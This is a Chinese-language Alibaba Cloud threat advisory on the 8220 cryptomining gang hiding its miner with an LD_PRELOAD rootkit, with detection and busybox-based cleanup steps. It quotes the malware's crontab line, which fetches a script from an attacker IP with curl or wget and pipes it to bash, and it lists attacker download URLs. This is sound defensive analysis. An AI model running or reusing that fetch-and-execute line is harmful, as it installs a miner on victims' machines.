威胁快报|挖矿团伙8220进化,rootkit挖矿趋势兴起

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全基线管理CSPM免费试用,1000次1年
云安全中心漏洞修复资源包免费试用,100次1年
简介: 近日,阿里云安全团队发现8220挖矿团伙为了更持久的驻留主机以获得最大收益,开始使用rootkit技术来进行自我隐藏。这类隐藏技术的使用在watchdogs等挖矿蠕虫使用后开始出现逐渐扩散和进化的趋势,此后预计主机侧的隐藏和对抗将成为主流。

近日,阿里云安全团队发现8220挖矿团伙为了更持久的驻留主机以获得最大收益,开始使用rootkit技术来进行自我隐藏。这类隐藏技术的使用在watchdogs等挖矿蠕虫使用后开始出现逐渐扩散和进化的趋势,此后预计主机侧的隐藏和对抗将成为主流。

背景

阿里云安全团队蠕虫监控平台发现8220挖矿团伙的下载脚本出现更新,除了下载必要的驻留脚本、挖矿程序之外,新增加了一个 so文件的下载地址:http://107.174.47.156/1.so

8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署挖矿程序的国内团伙[1-2],该团伙组合利用WebLogic XMLDecoder 反序列化漏洞(CVE-2017-10271)、Drupal RCE(CVE-2018-7600)、JBoss 反序列化命令执行漏洞(CVE-2017-12149)等多个漏洞进行攻击并部署挖矿程序进行牟利。

通过对相关脚本和该so的简单分析,我们确认8220团伙已经在其攻击工具包使用ProcessHider[3]对自身进行隐藏。ProcessHider是被众多恶意软件广泛利用的rootkit。挖矿蠕虫利用该工具使管理员难以通过常规手段检测到挖矿进程,从而提高挖矿进程的存活时间以最大化挖矿收益。随着时间的推移,可能会有越来越多的挖矿蠕虫加入rootkit功能。

蠕虫检测

如果在云控制台看到明显的CPU 上升,机器整体性能卡顿,但是登录机器使用 PS/TOP 等命令却无法定位到具体占用CPU的进程,此时该机器就很可能已经感染此类使用 rootkit 进行隐藏的挖矿蠕虫。

1.主机检测

该蠕虫利用LD_PRELOAD机制,使得自身的so文件先于系统加载,并通过劫持 readdir函数,使依赖该 API 返回的PS/TOP等系统命令无法正确返回结果 。 因此用户使用这些受影响的系统命令将无法看到真实的进程。

_


如上图所示,该蠕虫隐藏的进程关键字是kworkerds。

在主机侧可以使用以下命令对蠕虫进行检测

查看动态链接库
#ldd /bin/top|grep usr
  /usr/local/lib/libkk.so (0x00007f0f94026000)
发现存在异常的so文件

查看 PRE_LOAD系统变量
#cat /etc/ld.so.preload 
  /usr/local/lib/libkk.so
发现preload文件被修改

查看 crontab
#crontab -l
  */30 * * * *  (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
发现crontab出现奇怪的定时任务

使用普通top 查看到的进程:

_


LD_PRELOAD依赖于动态链接过程,因此使用静态编译的busybox执行top命令,将可以看到真实的全部进程。

_

2.网络检测

随着对抗的不断升级,挖矿蠕虫的自我隐藏功能必将不断升级,而面对全副武装的蠕虫病毒,普通用户在主机侧与其进行强对抗成本极高并且收益较低。针对该类蠕虫通过网络侧的NTA(Network Traffic Analysis)功能进行检测更加有效。因为无论攻击者在主机侧采用了何种隐藏手法,但其远程下载、C&C通信、矿池通信等行为均会在网络流量中留下痕迹。

下图是在网络侧云防火墙通过检测到主机感染后下载后门文件的行为发现该蠕虫的记录。

_

修复方案

1.由于本地命令可能都已被劫持,因此首先下载静态编译的busybox来执行指令,保证执行的系统命令不受劫持影响。

下载二进制
#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox
赋予执行权限
#chmod +x busybox

2.清理动态劫持

./busybox rm -f  /usr/local/lib/libkk.so 2>/dev/null
./busybox chattr -i /etc/ld.so.preload 2>/dev/null
./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null
./busybox rm -f /etc/ld.so.preload
./busybox touch /etc/ld.so.preload
./busybox chattr +i /etc/ld.so.preload
ldconfig

3.杀恶意进程和相关文件

./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep 'kworkerds' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep '107.174.47.156' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox rm -f /var/tmp/kworkerds
./busybox rm -f /var/tmp/sustse*

4.修复 crontab

./busybox chattr -i  /etc/cron.d/root  2>/dev/null
./busybox rm -f /etc/cron.d/root
./busybox chattr -i /etc/cron.d/apache  2>/dev/null
./busybox rm -f /var/spool/cron/apache
./busybox chattr -i /var/spool/cron/root  2>/dev/null
./busybox rm -f /var/spool/cron/root
./busybox chattr -i /var/spool/cron/crontabs/root  2>/dev/null
./busybox rm -f /var/spool/cron/crontabs/root
./busybox rm -rf /var/spool/cron/crontabs
./busybox touch /var/spool/cron/root
./busybox chattr +i /var/spool/cron/root

5.再次修复下 crontab,回到第3步再次执行

6..修复完成和重启crontab

service crond start

REF:

1.https://github.com/gianlucaborello/libprocesshider

相关文章
|
2月前
|
存储 人工智能 安全
AI时代的惊天危机!揭秘如何守护你的数据宝藏免受黑客魔爪侵袭!
【10月更文挑战第12天】在数字化时代,AI产品已深入生活的方方面面,但数据安全问题日益凸显。本文探讨了如何妥善处理AI产品的数据安全,包括建立数据保护机制、加强监管与审计、提升公众意识及关注新技术发展,确保数据的完整性、机密性和可用性。
59 1
|
4月前
|
安全 网络安全 数据安全/隐私保护
数字堡垒之下的隐秘战线:网络安全漏洞与加密技术的较量
在数字化浪潮中,网络安全成为维护信息安全的关键战场。本文将探讨网络安全中的漏洞、加密技术以及安全意识的重要性。通过分析近年来的典型安全事件,揭示网络攻击的手段和防御策略,强调公众和企业提升安全意识的必要性。
43 4
|
6月前
|
SQL 安全 数据安全/隐私保护
新兴勒索软件团伙崛起:他们是谁,以及是如何运作的
新兴勒索软件团伙崛起:他们是谁,以及是如何运作的
|
运维 安全 网络安全
NSA黑客工具泄露 网络世界的灾难级危机
美国国家安全局使用的攻击武器,将会极大提升黑色产业链、商业间谍组织技术水平! 2017黑客新手工具系列集合附链接 - 知乎专栏 先前发的工具系列的好几章节都被抽了,没办法,以后发不了,大家可以去我网盘和微博。
|
云安全 安全 fastjson
如果您正被AutoUpdate僵尸网络攻击,阿里云安全为你支招
近日,阿里云安全监测并捕获到一个针对云服务器发起攻击的新型僵尸网络,由于其使用的扫描、攻击程序名为AutoUpdate,我们也据此将其命名为AutoUpdate僵尸网络。
370 1
如果您正被AutoUpdate僵尸网络攻击,阿里云安全为你支招
|
Web App开发 安全 Docker
威胁快报|新兴挖矿团伙借助shodan作恶,非web应用安全再鸣警钟
近日,阿里云安全发现了一个使用未授权访问漏洞部署恶意Docker镜像进行挖矿的僵尸网络团伙。我们给这一团伙取名为Xulu,因为该团伙使用这个字符串作为挖矿时的用户名。 Xulu并不是第一个攻击Docker的恶意挖矿团伙,但它不同于其他僵尸网络。
4195 0
|
存储 安全
瑞星:“云攻击”已成现实
“1亿零53万人次网民遭钓鱼网站侵袭,给中国网民造成的直接经济损失至少在百亿级别。假淘宝网站、假腾讯网站、假工商银行网站、假中国银行网站,占据了钓鱼网站的前四位。” 19日,《瑞星2011上半年互联网安全报告》出炉,瑞星安全专家表示,“云攻击”(Threats to Cloud)已成现实,储存了大量用户资料和行为的“云提供商”,例如微博、社交网站、网络存储,甚至包括传统的电信运营商和酒店业者,正在面临前所未有的安全风险。
749 0
|
安全
IE7漏洞被瞄准 新型攻击将爆发
根据国外今早最新消息,互联网安全公司发现,微软曾在上周发布过补丁的IE7(不是早期版本)漏洞正在被攻击。虽然这种新型攻击现在规模很小,而且看起来很具有针对性,但是有可能会大规模爆发。 趋势科技介绍说,这种攻击始于一个电子邮件中的.doc文件。
709 0
|
云安全 安全 应用服务中间件
威胁快报|首爆新型ibus蠕虫,利用热门漏洞疯狂挖矿牟利
一、背景 近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件。黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台“肉鸡”作为蠕虫脚本的下载源。其余受控主机下载并运行此蠕虫脚本后,继续进行大规模漏洞扫描和弱口令爆破攻击,从而实现横向传播。
3368 0